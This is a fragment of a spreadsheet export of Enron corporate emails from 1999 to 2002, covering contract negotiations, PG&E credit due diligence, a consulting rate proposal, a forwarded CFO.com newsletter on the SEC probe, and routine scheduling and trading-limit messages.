_x000D_
_x000D_
---_x000D_
You are currently subscribed to special-offers as: mark.guzman@enron.com_x000D_
You can unsubscribe anytime at http://www.southwest.com/email/</t>
  </si>
  <si>
    <t>Sat, 24 Feb 2001 14:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>?_x000D_
 - TSOD_absolute.zip</t>
  </si>
  <si>
    <t>Wed, 16 Jan 2002 11:36:20 -0800 (PST)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 1/16/02; HourAhead hour: 14;  HourAhead schedule download failed. Manual intervention required._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002011614.txt_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
!!!Unknown database._x000D_
Alias: dbCaps97Data_x000D_
Error: dbCaps97Data: Cannot perform this operation on a closed database</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 02:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Enron Net Works Staff Meeting - Friday, June 9</t>
  </si>
  <si>
    <t xml:space="preserve">Janette,_x000D_
_x000D_
No worries.  The staff meeting has been canceled for today._x000D_
_x000D_
Liz_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Janette Elbertson_x000D_
06/07/2000 09:41 AM_x000D_
To: Greg Whalley/HOU/ECT@ECT, Liz M Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Enron Net Works Staff Meeting - Friday, June 9_x000D_
_x000D_
Mark Haedicke will be out of town and will not be able to attend the _x000D_
referenced meeting._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Oct 2001 11:33:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: SEC Probes Possible CFO Conflict at Enron</t>
  </si>
  <si>
    <t xml:space="preserve">Prentice:  The moral of the story:  Don't, for god sakes, be a CFO._x000D_
_x000D_
-----Original Message-----_x000D_
From: Nancy Sellers [mailto:Nancy.Sellers@RobertMondavi.com]_x000D_
Sent: Monday, October 22, 2001 12:54 PM_x000D_
To: 'Jeff Dasovich'; Prentice @ Berkeley; Prentice Sellers_x000D_
Subject: FW: SEC Probes Possible CFO Conflict at Enron_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: CFO.com_Newsletters@cfo.com [mailto:CFO.com_Newsletters@cfo.com]_x000D_
Sent: Monday, October 22, 2001 10:52 AM_x000D_
To: nancy.sellers@robertmondavi.com_x000D_
Subject: SEC Probes Possible CFO Conflict at Enron_x000D_
_x000D_
_x000D_
_x000D_
http://www.cfo.com _x000D_
_x000D_
CFO.com's_x000D_
Today in Finance_x000D_
_x000D_
_x000D_
________________________________Sponsor _________________________________x000D_
Redeploy 50% or more of your accounts payable staff. InvoicePack makes this_x000D_
possible by turning the laborious and expensive task of manually entering_x000D_
data from vendor invoices into a quick, inexpensive and more accurate_x000D_
process. By using innovative OCR and neural network technologies,_x000D_
InvoicePack automates invoice processing. This lets you reduce your accounts_x000D_
payable staff and redeploy those personnel in more productive areas and_x000D_
typically realize a one-year return-on-investment. To learn more, call us at_x000D_
858-320-1100 or to receive a free demo, visit_x000D_
http://ad.2clk.net/eclk;3458244;1729382256984211925;6541367;114046;;25943._x000D_
_x000D_
__________________________________________________________________________x000D_
_x000D_
Monday, October 22, 2001_x000D_
Related Party Crashers? SEC Looking Into Possible Conflict on Interest at_x000D_
Enron_x000D_
_x000D_
By Stephen Taub_x000D_
_x000D_
The Securities and Exchange Commission has requested that Enron provide_x000D_
information regarding certain related party transactions. _x000D_
_x000D_
"We welcome this request," said Kenneth L. Lay, Enron chairman and CEO in a_x000D_
prepared statement. "We will cooperate fully with the SEC." _x000D_
_x000D_
Enron, North America's biggest buyer and seller of natural gas and_x000D_
electricity, noted that its internal and external auditors and attorneys_x000D_
reviewed the related party arrangements, the Board was fully informed of and_x000D_
approved these arrangements, and they were disclosed in the company's SEC_x000D_
filings. "We believe everything that needed to be considered and done in_x000D_
connection with these transactions was considered and done," Lay added. _x000D_
_x000D_
As we noted on Friday, a limited partnership organized by chief financial_x000D_
officer Andrew Fastow racked up millions of dollars since 1997 in profits_x000D_
from transactions conducted with the energy company, according to The Wall_x000D_
Street Journal. The partnership reportedly renegotiated the terms of deals_x000D_
with Enron in ways that boosted its financial positions or reduced its risk_x000D_
of losses. _x000D_
_x000D_
_x000D_
REPORT: E&amp;Y REVENUES NEARLY HALVED_x000D_
Later this week, Ernst &amp; Young will announce that its revenue growth was_x000D_
nearly halved in the fiscal year ending June 30, according to the Financial_x000D_
Times. _x000D_
_x000D_
Specifically, the Big 5 professional services firm will report that revenues_x000D_
rose by 7.2 percent to $9.9 billion for the year. In fiscal 2000, revenues_x000D_
climbed by 14.1 percent, and by 13.5 percent the prior year. _x000D_
_x000D_
The reason for the drop in revenue growth may be that E&amp;Y fetches most of_x000D_
its business from the United States, and the U.S. economy tanked in the_x000D_
first half of this year. _x000D_
_x000D_
"We have been successful this year, despite the economy and during a period_x000D_
of great challenge and change in our profession," chairman James Turley told_x000D_
the FT. _x000D_
_x000D_
Rival Andersen has already reported that revenues rose 10 percent this year_x000D_
through August 31. _x000D_
_x000D_
Another reason for E&amp;Y's revenue retrenchment: the strong dollar. The firm_x000D_
is expected to announce that revenues increased 12.4 percent in local_x000D_
currency terms, according to the paper. _x000D_
_x000D_
Turley told the FT that his clients are less focused on the longer term and_x000D_
are instead concentrating on watching expenses, cash management, debt_x000D_
covenant issues, and security concerns. "We're going to see more covenant_x000D_
violations and that will drive restructuring issues," Turley told the FT. _x000D_
_x000D_
Read On! For More of Today in Finance_x000D_
http://m.s.maildart.net/link_30322_6541367_1_120086373_73941461_0_76_x000D_
_x000D_
_x000D_
**********************FROM OUR FEATURED ADVERTISER **********************_x000D_
_x000D_
How do you track business and financial news while still keeping on top of_x000D_
ever-changing financial accounting rules?  By joining CFOdirect Network,_x000D_
where you can find daily news updates and receive PwC's exclusive analysis_x000D_
on hot financial accounting topics. Sign up for a free trial membership to_x000D_
PwC's online resource for senior financial executives at:_x000D_
http://ad.2clk.net/eclk;3410577;1729382256984211925;6541367;92789;;21531._x000D_
_x000D_
_x000D_
**************************************************************************_x000D_
_x000D_
Take CFO's Budgeting and Planning Software survey._x000D_
The results of CFO's  survey will be used in a December Technology Report_x000D_
that will examine the change management issues that surround implementations_x000D_
of this type of software in organizations. All responses will only be used_x000D_
in the aggregate. Your input is important, please take a moment and_x000D_
participate. Thank you! _x000D_
http://charts.cfo.com/cfomag/bpsurvey1.html_x000D_
___________________________________________________________________________x000D_
_x000D_
Also on CFO.com:_x000D_
_x000D_
CAPITAL MARKETS: Banks and Brokerages Hit Hard by Economic Slump, Attack._x000D_
http://m.s.maildart.net/link_30323_6541367_1_120086373_73941461_0_77_x000D_
_x000D_
CFO EXCELLENCE: Less Business Wanted? It Worked for AmeriCredit._x000D_
http://m.s.maildart.net/link_30326_6541367_1_120086373_73941461_0_7a_x000D_
_x000D_
CFOs ON THE MOVE: Mint Condition? Veteran CFO Hired at Collectors Universe._x000D_
http://m.s.maildart.net/link_30325_6541367_1_120086373_73941461_0_79_x000D_
_x000D_
SPECIAL REPORT: Goodwill Games II: Reports from the Field._x000D_
http://m.s.maildart.net/link_30324_6541367_1_120086373_73941461_0_78_x000D_
_x000D_
_________________________________________________________________________x000D_
For information about advertising in this newsletter, contact Mimi_x000D_
Capalaces, VP of Sales. Call (212) 698-9738 or write to_x000D_
mimicapalaces@cfo.com _x000D_
_________________________________________________________________________x000D_
_x000D_
Get the Magazine - FREE Subscription - CFO Magazine is free to qualified_x000D_
readers. To subscribe go to:_x000D_
http://as400.halldata.com/cgi-bin/subscribe/cf?SS=SHRTFRM&amp;pk=HP7 _x000D_
_x000D_
Become a registered user and receive FREE, unlimited access to CFO.com. Go_x000D_
to: http://www.cfo.com/User_Registration _x000D_
_________________________________________________________________________x000D_
_x000D_
_x000D_
Copyright (c) 2001 CFO Publishing Corporation_x000D_
_x000D_
_x000D_
To access the Unsubscribe page, click this link:_x000D_
http://www.cfo.com/unsubscribe_nl/1,5013,807612|34978|7,00.html_x000D_
_x000D_
This email was sent to:nancy.sellers@robertmondavi.com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Mon, 28 May 2001 14:31:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>cha cha cha</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 _x000D_
 - Movie - Moulin Rouge - Cha Cha Cha.mp3 </t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 07:13:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Allegheny Term sheet and contract comments</t>
  </si>
  <si>
    <t>Gregg, _x000D_
_x000D_
My thoughts on Allegheny's changes to the Master are similar to Mary's.  I am _x000D_
generally fine with the changes except 1) I would counter with lowering the _x000D_
liquidated damages to 10 cents (ultimately, this is a business decision)  and _x000D_
2) I would tell them that we need arbitration.  In some respects, it is more _x000D_
likely that disputes would arise under this type of deal so it is even more _x000D_
important to have arbitration. Please let me know if you want me to talk to _x000D_
anyone at Allegheny about their changes._x000D_
_x000D_
Stacy_x000D_
----- Forwarded by Stacy E Dickson/HOU/ECT on 04/11/2001 01:50 PM -----_x000D_
_x000D_
	m.klyasheff@pecorp.com_x000D_
	04/10/2001 04:23 PM_x000D_
		 _x000D_
		 To: RRodrig5@enron.com, Gregg.Penman@enron.com, t.hermann@pecorp.com, _x000D_
r.dobson@pecorp.com, r.rodriguez@pecorp.com_x000D_
		 cc: Stacy.E.Dickson@enron.com, jeffrey.t.hodge@enron.com, s.halfin@pecorp.com_x000D_
		 Subject: RE: Allegheny Term sheet and contract comments_x000D_
_x000D_
_x000D_
 Attached, for your review, are my comments on Allegheny' proposed_x000D_
revisions to the enovate Master Agreement.  The short answer is that I do_x000D_
not oppose any of the changes, but there are at least two items that I_x000D_
consider business decisions._x000D_
 &lt;&lt;Allegheny Master K memo 04-10-01.doc&gt;&gt;_x000D_
_x000D_
_x000D_
&gt; ----------_x000D_
&gt; From:  Rodriguez, Roy_x000D_
&gt; Sent:  Monday, April 09, 2001 5:02 PM_x000D_
&gt; To:  'RRodrig5@enron.com'; 'Greg Penman'; Hermann, Timothy; Klyasheff,_x000D_
&gt; Mary P.; Dobson, Richard E._x000D_
&gt; Subject:  Allegheny Term sheet and contract comments_x000D_
&gt;_x000D_
&gt; &lt;&lt;File: Master Gas Firm Purchase Sale Agreement - clean_x000D_
&gt; 3Apr01.doc&gt;&gt;&lt;&lt;File: Master Gas Firm Purchase Sale Agreement - marked_x000D_
&gt; 3Apr01.doc&gt;&gt;_x000D_
&gt; Attached are comments from Allegheny, please review and provide comments_x000D_
&gt; to me by Wed. afternoon or earlier if possible._x000D_
&gt;_x000D_
&gt; Thanks everyone_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Kostiner, Barry (CICG - NY SWAPS)_x000D_
&gt; [mailto:bkostiner@exchange.ml.com]_x000D_
&gt; Sent: Monday, April 09, 2001 4:53 PM_x000D_
&gt; To: 'r.rodriguez@pecorp.com'_x000D_
&gt; Cc: Kapoor, Ravi (CICG - NY SWAPS)_x000D_
&gt; Subject: FW: enovate_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; I made an additional revision, changing CCT to CPT for the time zone._x000D_
&gt;_x000D_
&gt; &gt; Attached are the clean and blacklined versions of the enovate Gas_x000D_
&gt; Agreement and Confirmation._x000D_
&gt; &gt;_x000D_
&gt; &gt; &gt;  &lt;&lt;Balancing Service Term Sheet - clean 3Apr01.doc&gt;&gt; &gt; &gt;  &lt;&lt;Balancing_x000D_
&gt; Service Term Sheet - marked 3Apr01.doc&gt;&gt; &gt; &gt;  &lt;&lt;Master Gas Firm Purchase_x000D_
&gt; Sale Agreement - clean 3Apr01.doc&gt;&gt; &gt; &gt;  &lt;&lt;Master Gas Firm Purchase Sale_x000D_
&gt; Agreement - marked 3Apr01.doc&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
----------------------------------------------------------------_x000D_
The information transmitted is intended only for the person_x000D_
or entity to which it is addressed and may contain confidential_x000D_
and/or privileged material.  Any review, retransmission,_x000D_
dissemination or other use of, or taking of any action in reliance_x000D_
upon, this information by persons or entities other than the_x000D_
intended recipient is prohibited. If you received this in error,_x000D_
please contact the sender and delete the material from any computer._x000D_
_x000D_
 - Allegheny Master K memo 04-10-01.doc</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 08:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'technologydaily-alert-owner@mail2.cloakroom.com'})</t>
  </si>
  <si>
    <t>Technology Daily PM: Senate Vote On Net Taxes Raises Questions</t>
  </si>
  <si>
    <t>----------------------------------------------------------------------------_x000D_
NATIONAL JOURNAL'S TECHNOLOGY DAILY PM EDITION_x000D_
is now available at http://nationaljournal.com/pubs/techdaily/_x000D_
----------------------------------------------------------------------------_x000D_
_x000D_
AFTERNOON HIGHLIGHTS:_x000D_
_x000D_
TAXES: The Senate's vote on the Internet-access tax moratorium raised_x000D_
questions about the future of legislation to extend the moratorium._x000D_
_x000D_
PRIVACY: The Bush administration's comments on an OECD tax-haven plan have_x000D_
encouraged conservatives and privacy groups._x000D_
_x000D_
ON THE HILL: Lawmakers may not pass the tax-cut bill until after the start_x000D_
of the Memorial Day weekend._x000D_
_x000D_
E-COMMERCE: A House lawmaker reaffirmed his committement to introduce a_x000D_
measure banning Internet gambling._x000D_
_x000D_
_x000D_
TECH DAILY AFTERNOON FEATURE:_x000D_
Executive Summary: Editor Sharon McLoone provides a concise digest of the_x000D_
week's top high-tech news._x000D_
Click here to go directly to the feature -_x000D_
http://nationaljournal.com/pubs/techdaily/features/execsumm_x000D_
_x000D_
_x000D_
ALSO ON NATIONALJOURNAL.COM:_x000D_
-- The Scene: The Jeffords Defection And The Risk Of Snap Judgments_x000D_
http://nationaljournal.com/members/buzz/scene.htm_x000D_
_x000D_
-- Ad Spotlight: N.J. Gov Candidate Jim McGreevey (D) Runs Early Ad_x000D_
http://nationaljournal.com/members/adspotlight/2001/05/0525jmnj1.htm_x000D_
_x000D_
_x000D_
******************************************************_x000D_
GOT A JOB TO FILL? CAPITAL CAREER SOURCE CAN HELP_x000D_
_x000D_
Capital Career Source puts your job listing in front_x000D_
of thousands of top-notch job seekers -- many of them_x000D_
regular readers of NationalJournal.com._x000D_
_x000D_
Find the right people, right now. Call us at_x000D_
(202) 266-7259 for details, or go directly to_x000D_
http://www.capitalcareersource.com._x000D_
******************************************************_x000D_
_x000D_
_x000D_
----------------------------_x000D_
To stop receiving these E-mail Alerts:_x000D_
_x000D_
Reply to this message and include the word "unsubscribe" (without quotes)_x000D_
in the BODY of the message._x000D_
----------------------------_x000D_
_x000D_
_x000D_
National Journal's Technology Daily is published daily by National Journal_x000D_
Group Inc. For more information about National Journal Group's_x000D_
publications, go to http://www.nationaljournal.com.</t>
  </si>
  <si>
    <t>Tue, 14 Aug 2001 12:59:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ray.alvarez@enron.com', 'kate.symes@enron.com', 'paul.choi@enron.com', 'tim.heizenrader@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'm..driscoll@enron.com', 'chris.mallory@enron.com', 'stewart.rosman@enron.com', 'robert.badeer@enron.com', 'steve.swain@enron.com', 'f..calger@enron.com', 'chris.stokley@enron.com', 'paul.kaufman@enron.com', 'susan.mara@enron.com', 'jeff.richter@enron.com', 'bill.williams@enron.com', 'holli.krebs@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'phillip.platter@enron.com', 'john.malowney@enron.com', 'diana.scholtes@enron.com', 'greg.wolfe@enron.com', 'matt.motley@enron.com', 'mark.guzman@enron.com', 'elliot.mainzer@enron.com', 'jeff.dasovich@enron.com', 'c..hall@enron.com', 'h..foster@enron.com'})</t>
  </si>
  <si>
    <t>Latest information on FERC Commission Chair</t>
  </si>
  <si>
    <t>Per EPSA today, Pat Wood will be named the Chair of FERC.  Curt Hebert will be taking a job with Entergy._x000D_
_x000D_
David F. Perrino_x000D_
Director, Government Affairs_x000D_
Enron Corporation_x000D_
101 California Street, Suite 1950_x000D_
San Francisco, CA  94111_x000D_
Phone: 415.782.7801_x000D_
Fax: 415.782.7854_x000D_
Mobile: 415.794.8740</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 06:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rebecca.cantrell@enron.com', 'stephanie.miller@enron.com'})</t>
  </si>
  <si>
    <t>PGE due diligence effort</t>
  </si>
  <si>
    <t xml:space="preserve">Stephanie and Becky,_x000D_
_x000D_
I need your help with the PG&amp;E credit exposure diligence described in Travis _x000D_
McCullough's e:mail set forth below. Could you please forward me (i) copies _x000D_
of the Service Agreement, Capacity Release materials and executed PGT _x000D_
Agreement for the 67,000 MMBtu of transport acquired in 1998, and (ii) the _x000D_
Tariff provisions that deal with the matters described in Travis' e:mail.  _x000D_
Also, what additional transportation transactions do we currently have on _x000D_
PG&amp;E entities.  Do you have a feel for that? We are supposed to be helping _x000D_
Credit to get a handle on (a) PG&amp;E exposure and (b) setoff opportunities as _x000D_
to such exposure. Of course, Credit would like our input by Friday.  _x000D_
_x000D_
Thanks for your help._x000D_
Steve Van Hooser_x000D_
----- Forwarded by Steve Van Hooser/HOU/ECT on 01/10/2001 02:27 PM -----_x000D_
_x000D_
	Shari Stack_x000D_
	01/09/2001 10:10 AM_x000D_
		 _x000D_
		 To: Steve Van Hooser/HOU/ECT@ECT, Gerald Nemec/HOU/ECT@ECT, Alan _x000D_
Aronowitz/HOU/ECT@ECT, Wayne Gresham/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT, Dan _x000D_
J Hyvl/HOU/ECT@ECT, Nony Flores/HOU/ECT@ECT_x000D_
		 cc: Jeffrey T Hodge/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, Travis _x000D_
McCullough/HOU/ECT@ECT, Mark E Haedicke/HOU/ECT@ECT_x000D_
		 Subject: PGE due diligence effort_x000D_
_x000D_
_x000D_
	_x000D_
My asst., Kaye Ellis, will be calling each of you this morning to see if you _x000D_
can attend a short meeting today to discuss a due diligence effort with _x000D_
regard to Pacific Gas  and Electric Company and its various subsidiaries.  We _x000D_
have an overall exposure report from Credit which shows that Enron is exposed _x000D_
to PG&amp;E in virtually all of the commodities that we transact. _x000D_
_x000D_
In the meeting today - Travis and I will help you identify the PG&amp;E _x000D_
entity/entities which may have transactions with Enron concerning your _x000D_
particular commodity. We will ask you to pull the relevant master agreement _x000D_
and provide the information set forth below. _x000D_
Thank you in advance for your help,_x000D_
Shari_x000D_
   ----- Forwarded by Shari Stack/HOU/ECT on 01/09/2001 09:57 AM -----_x000D_
_x000D_
	Travis McCullough_x000D_
	01/09/2001 09:12 AM_x000D_
		 _x000D_
		 To: Shari Stack/HOU/ECT@ECT, Andrew Edison/NA/Enron@Enron_x000D_
		 cc: William S Bradford/HOU/ECT@ECT_x000D_
		 Subject: PGE due diligence effort_x000D_
Here is a list of the information that we will need to collect from each _x000D_
master agreement:_x000D_
Governing law;_x000D_
summary of setoff provisions (in particular, does the contract give us the _x000D_
right to setoff (i) only those transactions under the specific master, (ii) _x000D_
transactions under other agreements between the same counterparties; or (iii) _x000D_
transactions under other agreements between affiliates of the counterparties; _x000D_
(v) all transactions or only those transactions that we elect to offset;_x000D_
summary of termination provisions (automatic upon bankruptcy or insolvency of _x000D_
a party? any notice requirements?) _x000D_
summary of liquidated damages provisions (how computed?  provision for _x000D_
two-way LD's (such that even the breaching party gets a payment if they are _x000D_
in the money?) _x000D_
We also need to discuss how we can get comfortable that all transactions were _x000D_
properly booked under the correct master agreement, and that there are no _x000D_
significant "glitches" in our transaction documentation.  _x000D_
</t>
  </si>
  <si>
    <t>Tue, 3 Oct 2000 08:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Commodity Logic - EnFORM Proposal and Resumes</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Inja Chun/HOU/ECT on 10/03/2000 03:14 PM _x000D_
---------------------------_x000D_
   _x000D_
                        	_x000D_
	Enron Technology_x000D_
	_x000D_
	From:  Inja Chun                           09/25/2000 12:52 PM_x000D_
	_x000D_
To: Dan Bruce/HOU/ECT@ECT, Thomas D Gros/NA/Enron@Enron_x000D_
cc: Philippe A Bibi/HOU/ECT@ECT _x000D_
Subject: EnFORM Proposal and Resumes_x000D_
_x000D_
Dan and Tom,_x000D_
As we discussed, I am aggressively seeking well qualified top talent _x000D_
permanent and contract personnel for both Commodity Logic and Deal Bench.  We _x000D_
have specified our requirement for specialized technical experience _x000D_
(WebLogic, Java, JSP, HTML) and we are receiving many promising resumes in _x000D_
response.  We talked with Andersen Consulting, PriceWarterhouse, Enform, _x000D_
Valtech, Common Vision, Delinea, etc. and we made it clear that we want them _x000D_
to augment our permanent staff rather than doing a turn-key operation to _x000D_
which they have all agreed._x000D_
_x000D_
Attached are some of the preliminary resumes and fee schedules from EnFORM, _x000D_
we expect many others to be in approximately same range of rates.  If you _x000D_
have any questions, please let me know._x000D_
      Thanks,_x000D_
      Inja_x000D_
_x000D_
PROPOSAL- summary_x000D_
Technical BUSINESS MODEL DEVELOPMENTJava Support _x000D_
 Offer Expires on October 30, 2000   _x000D_
_x000D_
 Page 2 of 2_x000D_
_x000D_
Category	Resource	Level	Availability _x000D_
			Date	Billable Rate _x000D_
Technical Mgr	Bryan, Curt	Senior Manager	October 3	$180 (65% Std)_x000D_
Sr. Architect	Zhou, Xiaodong	Senior Manager	October 3	$180 (65% Std)_x000D_
	Andrews, Jim	Senior Manager	Now	$180 (65% Std)_x000D_
Architect	Kounthapanya, Sam	Lead Senior	Now	$125 (70% Std)_x000D_
	Tran, Tommy	Lead Senior	October 16	$125 (70% Std)_x000D_
	Moore, Paula	Senior Consultant	Now	$110 (70% Std)_x000D_
	Kefi, Omar	Senior Consultant	October 16	$110 (70% Std)_x000D_
Data Architect	Smith, Maria	Manager	Now	$145 (60% Std)_x000D_
Sr. Developer	Chung, Brandon	Senior Consultant	October 3	$110 (70% Std)_x000D_
	Hamilton, Matthew	Senior Consultant	October 30	$110 (70% Std)_x000D_
	Moore, Eric	Senior Consultant	October 30	$110 (70% Std)_x000D_
	Yeager, Nathan	Senior Consultant	October 30	$110 (70% Std)_x000D_
Jr. Developer	Cherry, Travis	Staff Consultant	Now	$55 (60% Std)_x000D_
	Dauphin, Doug	Staff Consultant	Now	$55 (60% Std)_x000D_
	Olson, Sara	Experienced Consultant	October 9	$80 (60% Std)_x000D_
	Sample, Matt	Experienced Consultant	October 30	$80 (60% Std)_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Inja Chun/HOU/ECT on 09/25/2000 11:00 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Martin, Dan" &lt;Dan.Martin@enform.com&gt; on 09/22/2000 05:38:30 PM_x000D_
To: inja.chun@enron.com, john.spitz@enron.com_x000D_
cc: "Wendler, Doug" &lt;Doug.Wendler@enform.com&gt;, "Rodriguez, Melody" _x000D_
&lt;Melody.Rodriguez@enform.com&gt; _x000D_
Subject: EnFORM Proposal and Resumes_x000D_
_x000D_
_x000D_
Inja and John,_x000D_
Again, it was a pleasure meeting with you yesterday.  As promised, I am_x000D_
sending the resumes of candidate architects and developers along with a_x000D_
short proposal for your review.   I also included the resumes of a few very_x000D_
capable Junior Developers in case you see a need for additional horsepower_x000D_
at a very low rate.   If possible, I would like to stop by for a short 10-15_x000D_
minute meeting with you on Monday so I can deliver a hard copy and then walk_x000D_
you through our proposal._x000D_
_x000D_
As you can imagine, we are very interested in working with Enron so we have_x000D_
given you the selection of our best folks and we have priced these_x000D_
individuals very aggressively.  I look forward to working with you in the_x000D_
near future._x000D_
_x000D_
Regards,_x000D_
_x000D_
Dan Martin_x000D_
Director, Java Technology_x000D_
(713)350-1829_x000D_
_x000D_
_x000D_
  &lt;&lt;Introducing EnFORM to Prospects.ppt&gt;&gt;  &lt;&lt;Enron_Proposal_1.doc&gt;&gt;  &lt;&lt;Enron_x000D_
Java Resumes.zip&gt;&gt;_x000D_
_x000D_
 - Introducing EnFORM to Prospects.ppt_x000D_
 - Enron_Proposal_1.doc_x000D_
 - Enron Java Resumes.zip_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 17 Jun 1999 11:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cris.sherman@enron.com'})</t>
  </si>
  <si>
    <t>Gas Purchase Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Cris,  For the sake of completeness, attached is the form of gas purchase _x000D_
agreement and confirm with the $10 million prepayment between ECC and ECS.  _x000D_
The pricing has not been input yet.  _x000D_
_x000D_
The gas purchase agreement between ECS and ECT would be a mirror of this one._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 14 Dec 1999 04:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lauri.allen@enron.com'})</t>
  </si>
  <si>
    <t>Meter 7268 Nov Allocation</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
---------------------- Forwarded by Lauri A Allen/HOU/ECT on 12/14/99 12:17 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
	Kimberly Vaughn_x000D_
	12/10/99 02:54 PM_x000D_
	_x000D_
To: Lauri A Allen/HOU/ECT@ECT_x000D_
cc: Mary M Smith/HOU/ECT@ECT _x000D_
Subject: Meter 7268 Nov Allocation_x000D_
_x000D_
Lauri ..  i have put this on strangas gas until I can get a contract from _x000D_
daren._x000D_
---------------------- Forwarded by Kimberly Vaughn/HOU/ECT on 12/10/99 01:52 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Lauri A Allen_x000D_
12/09/99 01:20 PM_x000D_
To: Kimberly Vaughn/HOU/ECT@ECT, Anita Luong/HOU/ECT@ECT_x000D_
cc: Howard B Camp/HOU/ECT@ECT, Mary M Smith/HOU/ECT@ECT _x000D_
Subject: Meter 7268 Nov Allocation_x000D_
_x000D_
Kim/Anita-_x000D_
_x000D_
A volume of 7247mm shows to have been allocated to the Reliant 201 contract _x000D_
for November.  There was no nomination for Reliant at this point in November _x000D_
and, therefore, there should be no volume allocated to their contract.  _x000D_
Please make sure these volumes are moved off the Reliant contract prior to _x000D_
November close._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 09:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.shankman@enron.com', 'rick.buy@enron.com', 'ted.ii@enron.com', 'greg.whalley@enron.com', 'cassandra.schultz@enron.com', 'john.nowlan@enron.com'})</t>
  </si>
  <si>
    <t>RE: Final 6/19/01 Global Products Notification</t>
  </si>
  <si>
    <t xml:space="preserve">True, but the limits and associated P&amp;L notifications relate to commodity _x000D_
groups rather than business units - they used to be the same. Unfortunately, _x000D_
where we have become more sophisticated and, as in this case legitimately _x000D_
hedge a natural exposure with some other commodity, the latter commodity (and _x000D_
associated P&amp;L) gets counted in the commodity "cut"._x000D_
_x000D_
Loss notifications, especially, serve as a "flag", and provided the _x000D_
explanation makes sense and everyone who needs to make a decision about it, _x000D_
can do so, then it serves its purpose. The other upside is that when, _x000D_
sometime in the future, we have to refer back to an event, we have good _x000D_
"institutional memory"._x000D_
_x000D_
I talked to Brent about this yesterday - my advice was that notifications _x000D_
would be better drafted by those closest to the positions (i.e. his mid _x000D_
office groups)_x000D_
_x000D_
Rgds_x000D_
DP_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Shankman, Jeffrey A.  _x000D_
Sent: Thursday, June 21, 2001 9:11 AM_x000D_
To: Abel, Chris; Buy, Rick; Nowlan Jr., John L.; Murphy, Ted; Port, David; _x000D_
Schultz, Cassandra; Whalley, Greg_x000D_
Cc: Apollo, Beth; Wilson, Shona; Thibodeaux, Kenneth; Price, Brent A.; Hall, _x000D_
D. Todd; Burns, Jennifer; Romero, Araceli; Taylor, Liz; Wallace, Cassi_x000D_
Subject: RE: Final 6/19/01 Global Products Notification_x000D_
_x000D_
In this Violation memo, you are taking out positive P&amp;L associated to a nat _x000D_
gas posion in the LPG books which is a true hedge versus some long dated _x000D_
propane positions.  When you add back the hedge P&amp;L I believe there is no _x000D_
violation._x000D_
_x000D_
Jeff_x000D_
_x000D_
